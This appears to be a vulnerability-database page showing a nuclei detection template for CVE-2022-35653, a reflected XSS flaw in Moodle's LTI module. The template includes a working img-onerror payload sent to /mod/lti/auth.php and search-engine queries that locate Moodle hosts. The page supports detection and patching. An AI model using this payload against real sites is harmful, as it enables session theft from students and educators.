Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Moodle LTI module Reflected - Cross-Site Scripting

🗓️ 30 Jun 2026 04:56:11Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 971 Views

Moodle LTI module Reflected - Cross-Site Scripting vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2022-35653
25 Jul 202216:15
attackerkb
BDU FSTEC		The vulnerability of the LTI module in the virtual learning environment Moodle, which allows attackers to carry out phishing attacks or expose sensitive information
10 Aug 202200:00
bdu_fstec
Circl		CVE-2022-35653
25 Jul 202220:33
circl
CNNVD		Moodle 跨站脚本漏洞
19 Jul 202200:00
cnnvd
CNVD		Moodle Cross-Site Scripting Vulnerability (CNVD-2022-54914)
21 Jul 202200:00
cnvd
CVE		CVE-2022-35653
25 Jul 202215:33
cve
Cvelist		CVE-2022-35653
25 Jul 202215:33
cvelist
Fedora		[SECURITY] Fedora 36 Update: moodle-3.11.8-1.fc36
27 Jul 202202:24
fedora
Fedora		[SECURITY] Fedora 35 Update: moodle-3.11.8-1.fc35
27 Jul 202202:35
fedora
Github Security Blog		Moodle LTI module reflected XSS risk
26 Jul 202200:00
github
Rows per page
id: CVE-2022-35653

info:
  name: Moodle LTI module Reflected - Cross-Site Scripting
  author: iamnoooob,pdresearch
  severity: medium
  description: |
    A reflected XSS issue was identified in the LTI module of Moodle. The vulnerability exists due to insufficient sanitization of user-supplied data in the LTI module. A remote attacker can trick the victim to follow a specially crafted link and execute arbitrary HTML and script code in user's browser in context of vulnerable website to steal potentially sensitive information, change appearance of the web page, can perform phishing and drive-by-download attacks.
  impact: |
    Attackers can inject malicious JavaScript through the LTI module that executes in educators' or students' browsers, potentially stealing Moodle session credentials and accessing sensitive course information.
  remediation: |
    Update Moodle to a patched version that properly sanitizes user input in the LTI module and prevents execution of injected scripts.
  reference:
    - http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-72299
    - https://nvd.nist.gov/vuln/detail/CVE-2022-35653
    - https://bugzilla.redhat.com/show_bug.cgi?id=2106277
    - https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6MOKYVRNFNAODP2XSMGJ5CRDUZCZKAR3/
    - https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MTKUSFPSYFINSQFSOHDQIDVE6FWBEU6V/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-35653
    cwe-id: CWE-79
    epss-score: 0.03673
    epss-percentile: 0.88268
    cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: moodle
    product: moodle
    shodan-query:
      - title:"Moodle"
      - cpe:"cpe:2.3:a:moodle:moodle"
      - http.title:"moodle"
    fofa-query: title="moodle"
    google-query: intitle:"moodle"
  tags: cve,cve2022,moodle,xss,vkev,vuln

http:
  - raw:
      - |
        POST /mod/lti/auth.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        xxx"><img/src%3d'x'onerror%3dalert('document_domain')>=1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img/src='x'onerror=alert('document_domain')>"
          - "moodle-editor"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a004630440220443692ad4fd8a4200ed434460294761c855857bd524093c3ae7244b9905bf51702203d87b83987a2961974497d98f2f16b10a5d17f4c23d6e5f77b707c660643ee80:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.16.1
EPSS0.03673
cvecve2022moodlexssreflectedcross-site scriptingremote attackerhtmlscript codeuser's browseruser-supplied datavulnerable websitesensitive informationphishingdrive-by-downloadinsufficient sanitizationcve-2022-35653cwe-79cvss:3.1nistredhatfedoramoodle lti moduleuser's browseruser-supplied dataweb pageremote attackervulnerabilityxssmoodlemoodle-editor.
971